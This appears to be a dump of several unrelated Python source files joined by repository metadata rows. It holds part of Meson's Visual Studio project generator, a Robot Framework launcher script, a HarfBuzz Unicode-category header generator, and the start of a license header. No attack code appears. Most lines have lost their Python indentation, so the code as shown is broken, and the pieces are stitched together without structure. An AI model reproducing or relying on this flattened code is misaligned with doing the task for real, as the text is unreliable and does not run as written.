for lib in self.get_custom_target_provided_libraries(target):
additional_links.append(self.relpath(lib, self.get_target_dir(target)))
additional_objects = []
for o in self.flatten_object_list(target, down):
            assert isinstance(o, str)
additional_objects.append(o)
for o in custom_objs:
additional_objects.append(o)
if len(extra_link_args) > 0:
extra_link_args.append('%(AdditionalOptions)')
ET.SubElement(link, "AdditionalOptions").text = ' '.join(extra_link_args)
if len(additional_libpaths) > 0:
additional_libpaths.insert(0, '%(AdditionalLibraryDirectories)')
ET.SubElement(link, 'AdditionalLibraryDirectories').text = ';'.join(additional_libpaths)
if len(additional_links) > 0:
additional_links.append('%(AdditionalDependencies)')
ET.SubElement(link, 'AdditionalDependencies').text = ';'.join(additional_links)
ofile = ET.SubElement(link, 'OutputFile')
ofile.text = '$(OutDir)%s' % target.get_filename()
subsys = ET.SubElement(link, 'SubSystem')
subsys.text = subsystem
if (isinstance(target, build.SharedLibrary) or isinstance(target, build.Executable)) and target.get_import_filename():
# DLLs built with MSVC always have an import library except when
# they're data-only DLLs, but we don't support those yet.
ET.SubElement(link, 'ImportLibrary').text = target.get_import_filename()
if isinstance(target, build.SharedLibrary):
# Add module definitions file, if provided
if target.vs_module_defs:
relpath = os.path.join(down, target.vs_module_defs.rel_to_builddir(self.build_to_src))
ET.SubElement(link, 'ModuleDefinitionFile').text = relpath
if self.debug:
pdb = ET.SubElement(link, 'ProgramDataBaseFileName')
            pdb.text = '$(OutDir)%s.pdb' % target_name
targetmachine = ET.SubElement(link, 'TargetMachine')
targetplatform = self.platform.lower()
if targetplatform == 'win32':
targetmachine.text = 'MachineX86'
elif targetplatform == 'x64':
targetmachine.text = 'MachineX64'
elif targetplatform == 'arm':
targetmachine.text = 'MachineARM'
elif targetplatform == 'arm64':
targetmachine.text = 'MachineARM64'
elif targetplatform == 'arm64ec':
targetmachine.text = 'MachineARM64EC'
else:
raise MesonException('Unsupported Visual Studio target machine: ' + targetplatform)
# /nologo
ET.SubElement(link, 'SuppressStartupBanner').text = 'true'
# /release
if not self.environment.coredata.get_option(OptionKey('debug')):
ET.SubElement(link, 'SetChecksum').text = 'true'
meson_file_group = ET.SubElement(root, 'ItemGroup')
ET.SubElement(meson_file_group, 'None', Include=os.path.join(proj_to_src_dir, build_filename))
# Visual Studio can't load projects that present duplicated items. Filter them out
# by keeping track of already added paths.
def path_normalize_add(path, lis):
normalized = os.path.normcase(os.path.normpath(path))
if normalized not in lis:
lis.append(normalized)
return True
else:
return False
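        # Illustrative example: on Windows 'Foo\\..\\BAR.c' and 'bar.c' normalize
        # to the same key, so the second occurrence is filtered out.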
previous_includes = []
if len(headers) + len(gen_hdrs) + len(target.extra_files) + len(pch_sources) > 0:
inc_hdrs = ET.SubElement(root, 'ItemGroup')
for h in headers:
relpath = os.path.join(down, h.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=relpath)
for h in gen_hdrs:
if path_normalize_add(h, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=h)
for h in target.extra_files:
relpath = os.path.join(down, h.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=relpath)
for lang in pch_sources:
h = pch_sources[lang][0]
path = os.path.join(proj_to_src_dir, h)
if path_normalize_add(path, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=path)
previous_sources = []
if len(sources) + len(gen_src) + len(pch_sources) > 0:
inc_src = ET.SubElement(root, 'ItemGroup')
for s in sources:
relpath = os.path.join(down, s.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=relpath)
lang = Vs2010Backend.lang_from_source_file(s)
self.add_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
self.add_include_dirs(lang, inc_cl, file_inc_dirs)
ET.SubElement(inc_cl, 'ObjectFileName').text = "$(IntDir)" + self.object_filename_from_source(target, s)
for s in gen_src:
if path_normalize_add(s, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=s)
lang = Vs2010Backend.lang_from_source_file(s)
self.add_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
self.add_include_dirs(lang, inc_cl, file_inc_dirs)
for lang in pch_sources:
impl = pch_sources[lang][1]
if impl and path_normalize_add(impl, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=impl)
self.create_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
pch_header_dir = pch_sources[lang][3]
if pch_header_dir:
inc_dirs = copy.deepcopy(file_inc_dirs)
inc_dirs[lang] = [pch_header_dir] + inc_dirs[lang]
else:
inc_dirs = file_inc_dirs
self.add_include_dirs(lang, inc_cl, inc_dirs)
previous_objects = []
if self.has_objects(objects, additional_objects, gen_objs):
inc_objs = ET.SubElement(root, 'ItemGroup')
for s in objects:
relpath = os.path.join(down, s.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_objects):
ET.SubElement(inc_objs, 'Object', Include=relpath)
for s in additional_objects:
if path_normalize_add(s, previous_objects):
ET.SubElement(inc_objs, 'Object', Include=s)
self.add_generated_objects(inc_objs, gen_objs)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_regenproj(self, project_name, ofname):
root = ET.Element('Project', {'DefaultTargets': 'Build',
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.regen_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType').text = "Utility"
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'regen-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = project_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
regen_command = self.environment.get_build_command() + ['--internal', 'regencheck']
cmd_templ = '''call %s > NUL
"%s" "%s"'''
regen_command = cmd_templ % \
(self.get_vcvars_command(), '" "'.join(regen_command), self.environment.get_scratch_dir())
self.add_custom_build(root, 'regen', regen_command, deps=self.get_regen_filelist(),
outputs=[Vs2010Backend.get_regen_stampfile(self.environment.get_build_dir())],
msg='Checking whether solution needs to be regenerated.')
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
ET.SubElement(root, 'ImportGroup', Label='ExtensionTargets')
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_testproj(self, target_name, ofname):
project_name = target_name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.test_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'test-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
# FIXME: No benchmarks?
test_command = self.environment.get_build_command() + ['test', '--no-rebuild']
if not self.environment.coredata.get_option(OptionKey('stdsplit')):
test_command += ['--no-stdsplit']
if self.environment.coredata.get_option(OptionKey('errorlogs')):
test_command += ['--print-errorlogs']
self.serialize_tests()
self.add_custom_build(root, 'run_tests', '"%s"' % ('" "'.join(test_command)))
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_installproj(self, target_name, ofname):
self.create_install_data_files()
project_name = target_name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.install_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'install-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
install_command = self.environment.get_build_command() + ['install', '--no-rebuild']
self.add_custom_build(root, 'run_install', '"%s"' % ('" "'.join(install_command)))
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def add_custom_build(self, node, rulename, command, deps=None, outputs=None, msg=None, verify_files=True):
igroup = ET.SubElement(node, 'ItemGroup')
rulefile = os.path.join(self.environment.get_scratch_dir(), rulename + '.rule')
if not os.path.exists(rulefile):
with open(rulefile, 'w', encoding='utf-8') as f:
f.write("# Meson regen file.")
custombuild = ET.SubElement(igroup, 'CustomBuild', Include=rulefile)
if msg:
message = ET.SubElement(custombuild, 'Message')
message.text = msg
if not verify_files:
ET.SubElement(custombuild, 'VerifyInputsAndOutputsExist').text = 'false'
cmd_templ = '''setlocal
%s
if %%errorlevel%% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %%errorlevel%% & goto :cmDone
:cmErrorLevel
exit /b %%1
:cmDone
if %%errorlevel%% neq 0 goto :VCEnd'''
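        # The wrapper above mimics the boilerplate Visual Studio itself emits for
        # custom build steps: it runs the command under setlocal/endlocal and
        # forwards a non-zero errorlevel so MSBuild treats the step as failed.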
ET.SubElement(custombuild, 'Command').text = cmd_templ % command
if not outputs:
# Use a nonexistent file to always consider the target out-of-date.
outputs = [self.nonexistent_file(os.path.join(self.environment.get_scratch_dir(),
'outofdate.file'))]
ET.SubElement(custombuild, 'Outputs').text = ';'.join(outputs)
if deps:
ET.SubElement(custombuild, 'AdditionalInputs').text = ';'.join(deps)
@staticmethod
def nonexistent_file(prefix):
i = 0
file = prefix
        while os.path.exists(file):
            file = '%s%d' % (prefix, i)
            i += 1
        return file
def generate_debug_information(self, link):
# valid values for vs2015 is 'false', 'true', 'DebugFastLink'
ET.SubElement(link, 'GenerateDebugInformation').text = 'true'
def add_regen_dependency(self, root):
regen_vcxproj = os.path.join(self.environment.get_build_dir(), 'REGEN.vcxproj')
self.add_project_reference(root, regen_vcxproj, self.environment.coredata.regen_guid)
| apache-2.0 | 3,410,752,762,889,756,700 | 52.52776 | 137 | 0.584703 | false |
iamApalive/robocop | bin/execute.py | 1 | 1957 | import robot,os
from robot import libraries
#from robot import robot_imports
#from robot.api import ExecutionResult
#from robot.api import TestData
def main():
#Push required data in builtins
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", "--test", dest="testlist", help="Specify file path of TestList to be executed", metavar="path-to-file")
parser.add_option("-b", "--browser", action="store", dest="browser")
parser.add_option("-i", "--includetag", dest="testincludetags", default=False, help="Run tests of given tag only")
parser.add_option("-e", "--excludetag", dest="testexcludetags", default=False, help="Exclude tests of given tag")
parser.add_option("-r", "--rungiventests", dest="rungiventests", default=False, help="Execute only given test case from suite")
parser.add_option("-m", "--randomize",action="store_true", dest="runrandomize", default=False, help="Randomizes the test execution order")
parser.add_option("-f", "--exitonfailure",action="store_true", dest="exitonfailure", default=False, help="Exit suite if test failed")
parser.add_option("-s", "--runsuite", action="store", dest="runsuitesetup", help="Run suite setup")
parser.add_option("-g", "--debugfile", action="store_true", dest="debugfile", default=False, help="Create debug log file")
parser.add_option("-u", "--baseurl", action="store", dest="baseurl")
parser.add_option("-n", "--TestName", action="store", dest="test_name")
parser.add_option("-M", "--MetaData", action="store", dest="metadata")
# parser.add_option("-a", "--abortonfailure", action="store_true", dest="abortonfailure", default=False, help="Abort suite on first test failure ")
s,remainder = parser.parse_args()
global tr
tr = os.getcwd()
from robot import pythonpathsetter
pythonpathsetter.add_path(tr)
robot.run(s.testlist)
if __name__ == "__main__":
main()
| apache-2.0 | -5,823,500,524,515,763,000 | 53.361111 | 151 | 0.681145 | false |
Crystalnix/house-of-life-chromium | third_party/harfbuzz/contrib/tables/category-parse.py | 55 | 2223 | import sys
from unicode_parse_common import *
# http://www.unicode.org/Public/5.1.0/ucd/extracted/DerivedGeneralCategory.txt
category_to_harfbuzz = {
'Mn': 'HB_Mark_NonSpacing',
'Mc': 'HB_Mark_SpacingCombining',
'Me': 'HB_Mark_Enclosing',
'Nd': 'HB_Number_DecimalDigit',
'Nl': 'HB_Number_Letter',
'No': 'HB_Number_Other',
'Zs': 'HB_Separator_Space',
'Zl': 'HB_Separator_Line',
'Zp': 'HB_Separator_Paragraph',
'Cc': 'HB_Other_Control',
'Cf': 'HB_Other_Format',
'Cs': 'HB_Other_Surrogate',
'Co': 'HB_Other_PrivateUse',
'Cn': 'HB_Other_NotAssigned',
'Lu': 'HB_Letter_Uppercase',
'Ll': 'HB_Letter_Lowercase',
'Lt': 'HB_Letter_Titlecase',
'Lm': 'HB_Letter_Modifier',
'Lo': 'HB_Letter_Other',
'Pc': 'HB_Punctuation_Connector',
'Pd': 'HB_Punctuation_Dash',
'Ps': 'HB_Punctuation_Open',
'Pe': 'HB_Punctuation_Close',
'Pi': 'HB_Punctuation_InitialQuote',
'Pf': 'HB_Punctuation_FinalQuote',
'Po': 'HB_Punctuation_Other',
'Sm': 'HB_Symbol_Math',
'Sc': 'HB_Symbol_Currency',
'Sk': 'HB_Symbol_Modifier',
'So': 'HB_Symbol_Other',
}
def main(infile, outfile):
ranges = unicode_file_parse(infile, category_to_harfbuzz)
ranges = sort_and_merge(ranges)
print >>outfile, '// Generated from Unicode script tables\n'
print >>outfile, '#ifndef CATEGORY_PROPERTIES_H_'
print >>outfile, '#define CATEGORY_PROPERTIES_H_\n'
print >>outfile, '#include <stdint.h>'
print >>outfile, '#include "harfbuzz-external.h"\n'
print >>outfile, 'struct category_property {'
print >>outfile, ' uint32_t range_start;'
print >>outfile, ' uint32_t range_end;'
print >>outfile, ' HB_CharCategory category;'
print >>outfile, '};\n'
print >>outfile, 'static const struct category_property category_properties[] = {'
for (start, end, value) in ranges:
print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value)
print >>outfile, '};\n'
print >>outfile, 'static const unsigned category_properties_count = %d;\n' % len(ranges)
print >>outfile, '#endif // CATEGORY_PROPERTIES_H_'
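# For reference, each emitted table row has the form below; the actual ranges
# depend on the DerivedGeneralCategory.txt input, so these numbers are only
# illustrative:
#   {0x300, 0x36f, HB_Mark_NonSpacing},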
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <input .txt> <output .h>' % sys.argv[0]
else:
main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
| bsd-3-clause | -8,029,093,537,978,823,000 | 30.757143 | 90 | 0.637877 | false |
CharithYMendis/Helium | utility/drclient.py | 1 | 3592 | import os
import subprocess
import common
def get_drclient_command(client_args,exec_args):
dr32 = os.environ.get('DYNAMORIO_32_RELEASE_HOME')
dr_path = dr32 + '/bin32/drrun.exe'
command = dr_path + ' -root ' + dr32 + ' -syntax_intel -c exalgo.dll ' + client_args + ' -- ' + exec_args
return command
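# Rough shape of the assembled command (illustrative placeholders only; the real
# prefix comes from the DYNAMORIO_32_RELEASE_HOME environment variable):
#   <dr32>/bin32/drrun.exe -root <dr32> -syntax_intel -c exalgo.dll <client_args> -- <exec_args>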
def get_filter_mode(filter_string):
filter_list = ['bb','module','range','func','neg_module','none','app_pc','nudge']
return str(filter_list.index(filter_string) + 1)
def get_instrace_mode(instrace_string):
if instrace_string == '':
return ''
else:
instrace_list = ['opndtrace','opcodetrace','disasmtrace','instrace','ins_distrace']
return str(instrace_list.index(instrace_string) + 1)
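# Both helpers above return 1-based positions as strings, for example:
#   get_filter_mode('module')      -> '2'
#   get_instrace_mode('instrace')  -> '4'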
def create_client_args(clients,executable,
filter_file,filter_mode,
instrace_mode,in_image,
debug):
filter_mode_num = get_filter_mode(filter_mode)
filter_string = filter_file + ' ' + filter_mode_num
instrace_mode_num = get_instrace_mode(instrace_mode)
output_folder = os.environ.get('EXALGO_OUTPUT_FOLDER')
log_folder = os.environ.get('EXALGO_LOG_FOLDER')
filter_folder = os.environ.get('EXALGO_FILTER_FOLDER')
md_app_pc_file = filter_folder + '\\filter_' + executable + '_app_pc.log'
debug_value = common.boolstr(debug)
client_args = '-logdir ' + log_folder + ' -debug ' + debug_value + ' -log 1 -exec ' + executable
split = clients.split(',')
for client in split:
if client == 'functrace':
client_args += ' -functrace ' + filter_string
if client == 'profile':
client_args += ' -profile ' + filter_string + ' ' + output_folder + ' ' + in_image
if client == 'memtrace':
client_args += ' -memtrace ' + filter_string + ' ' + output_folder + ' ' + in_image
if client == 'funcwrap':
client_args += ' -funcwrap ' + filter_file
if client == 'cpuid':
client_args += ' -cpuid'
if client == 'inscount':
            client_args += ' -inscount ' + filter_string
if client == 'instrace':
client_args += ' -instrace ' + filter_string + ' ' + output_folder + ' 600000 ' + instrace_mode_num + ' ' + in_image
if client == 'memdump':
client_args += ' -memdump ' + filter_string + ' ' + md_app_pc_file + ' ' + output_folder
if client == 'funcreplace':
client_args += ' -funcreplace ' + filter_string
if client == 'misc':
client_args += ' -misc ' + filter_string
return client_args
def run_drclients(path,executable,args,
debug,clients,
filter_mode,filter_file,
input_image,instrace_mode):
client_args = create_client_args(clients,executable,filter_file,filter_mode,instrace_mode,input_image,debug)
dr_client_command = get_drclient_command(client_args,path + ' ' + common.xstr(args))
parent_folder = os.environ.get('EXALGO_PARENT_FOLDER')
os.chdir(parent_folder + '/dr_clients/build32/bin')
p = subprocess.Popen(dr_client_command)
p.communicate()
| mit | 4,375,205,477,405,711,400 | 40.767442 | 140 | 0.52255 | false |
hslee16/ansible-modules-extras | packaging/os/svr4pkg.py | 126 | 7874 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Boyd Adamson <boyd () boydadamson.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: svr4pkg
short_description: Manage Solaris SVR4 packages
description:
- Manages SVR4 packages on Solaris 10 and 11.
- These were the native packages on Solaris <= 10 and are available
as a legacy feature in Solaris 11.
- Note that this is a very basic packaging system. It will not enforce
dependencies on install or remove.
version_added: "0.9"
author: "Boyd Adamson (@brontitall)"
options:
name:
description:
- Package name, e.g. C(SUNWcsr)
required: true
state:
description:
- Whether to install (C(present)), or remove (C(absent)) a package.
- If the package is to be installed, then I(src) is required.
- The SVR4 package system doesn't provide an upgrade operation. You need to uninstall the old, then install the new package.
required: true
choices: ["present", "absent"]
src:
description:
- Specifies the location to install the package from. Required when C(state=present).
- "Can be any path acceptable to the C(pkgadd) command's C(-d) option. e.g.: C(somefile.pkg), C(/dir/with/pkgs), C(http:/server/mypkgs.pkg)."
- If using a file or directory, they must already be accessible by the host. See the M(copy) module for a way to get them there.
proxy:
description:
- HTTP[s] proxy to be used if C(src) is a URL.
response_file:
description:
- Specifies the location of a response file to be used if package expects input on install. (added in Ansible 1.4)
required: false
zone:
description:
- Whether to install the package only in the current zone, or install it into all zones.
- The installation into all zones works only if you are working with the global zone.
required: false
default: "all"
choices: ["current", "all"]
version_added: "1.6"
category:
description:
- Install/Remove category instead of a single package.
required: false
choices: ["true", "false"]
version_added: "1.6"
'''
EXAMPLES = '''
# Install a package from an already copied file
- svr4pkg: name=CSWcommon src=/tmp/cswpkgs.pkg state=present
# Install a package directly from an http site
- svr4pkg: name=CSWpkgutil src=http://get.opencsw.org/now state=present zone=current
# Install a package with a response file
- svr4pkg: name=CSWggrep src=/tmp/third-party.pkg response_file=/tmp/ggrep.response state=present
# Ensure that a package is not installed.
- svr4pkg: name=SUNWgnome-sound-recorder state=absent
# Ensure that a category is not installed.
- svr4pkg: name=FIREFOX state=absent category=true
'''
import os
import tempfile
def package_installed(module, name, category):
cmd = [module.get_bin_path('pkginfo', True)]
cmd.append('-q')
if category:
cmd.append('-c')
cmd.append(name)
rc, out, err = module.run_command(' '.join(cmd))
if rc == 0:
return True
else:
return False
def create_admin_file():
(desc, filename) = tempfile.mkstemp(prefix='ansible_svr4pkg', text=True)
fullauto = '''
mail=
instance=unique
partial=nocheck
runlevel=quit
idepend=nocheck
rdepend=nocheck
space=quit
setuid=nocheck
conflict=nocheck
action=nocheck
networktimeout=60
networkretries=3
authentication=quit
keystore=/var/sadm/security
proxy=
basedir=default
'''
os.write(desc, fullauto)
os.close(desc)
return filename
def run_command(module, cmd):
progname = cmd[0]
cmd[0] = module.get_bin_path(progname, True)
return module.run_command(cmd)
def package_install(module, name, src, proxy, response_file, zone, category):
adminfile = create_admin_file()
cmd = [ 'pkgadd', '-n']
if zone == 'current':
cmd += [ '-G' ]
cmd += [ '-a', adminfile, '-d', src ]
if proxy is not None:
cmd += [ '-x', proxy ]
if response_file is not None:
cmd += [ '-r', response_file ]
if category:
cmd += [ '-Y' ]
cmd.append(name)
(rc, out, err) = run_command(module, cmd)
os.unlink(adminfile)
return (rc, out, err)
def package_uninstall(module, name, src, category):
adminfile = create_admin_file()
if category:
cmd = [ 'pkgrm', '-na', adminfile, '-Y', name ]
else:
cmd = [ 'pkgrm', '-na', adminfile, name]
(rc, out, err) = run_command(module, cmd)
os.unlink(adminfile)
return (rc, out, err)
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required = True),
state = dict(required = True, choices=['present', 'absent']),
src = dict(default = None),
proxy = dict(default = None),
response_file = dict(default = None),
zone = dict(required=False, default = 'all', choices=['current','all']),
category = dict(default=False, type='bool')
),
supports_check_mode=True
)
state = module.params['state']
name = module.params['name']
src = module.params['src']
proxy = module.params['proxy']
response_file = module.params['response_file']
zone = module.params['zone']
category = module.params['category']
rc = None
out = ''
err = ''
result = {}
result['name'] = name
result['state'] = state
if state == 'present':
if src is None:
module.fail_json(name=name,
msg="src is required when state=present")
if not package_installed(module, name, category):
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = package_install(module, name, src, proxy, response_file, zone, category)
# Stdout is normally empty but for some packages can be
# very long and is not often useful
if len(out) > 75:
out = out[:75] + '...'
elif state == 'absent':
if package_installed(module, name, category):
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = package_uninstall(module, name, src, category)
out = out[:75]
# Returncodes as per pkgadd(1m)
# 0 Successful completion
# 1 Fatal error.
# 2 Warning.
# 3 Interruption.
# 4 Administration.
# 5 Administration. Interaction is required. Do not use pkgadd -n.
# 10 Reboot after installation of all packages.
# 20 Reboot after installation of this package.
# 99 (observed) pkgadd: ERROR: could not process datastream from </tmp/pkgutil.pkg>
if rc in (0, 2, 3, 10, 20):
result['changed'] = True
# no install nor uninstall, or failed
else:
result['changed'] = False
# Only return failed=False when the returncode is known to be good as there may be more
# undocumented failure return codes
if rc not in (0, 2, 10, 20):
result['failed'] = True
else:
result['failed'] = False
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | -7,796,063,220,856,292,000 | 31.270492 | 147 | 0.639319 | false |
alanquillin/quark | quark/protocols.py | 3 | 5847 | # Copyright 2014 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
